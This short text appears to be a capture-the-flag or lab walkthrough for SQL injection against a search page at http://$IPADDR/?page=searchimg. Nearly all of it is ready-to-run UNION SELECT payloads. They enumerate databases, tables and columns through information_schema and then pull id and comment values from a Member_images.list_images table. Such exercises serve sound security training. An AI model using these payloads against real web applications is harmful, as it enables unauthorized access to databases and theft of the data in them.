To exploit, go to the http://$IPADDR/?page=searchimg and write the following commands at the search field:
List all the tables and related databases:
1 union select table_name, table_schema from information_schema.tables
List all table columns and related table names:
1 union select column_name, table_name from information_schema.columns
List all comments from list_images table:
1 union select id, comment from Member_images.list_images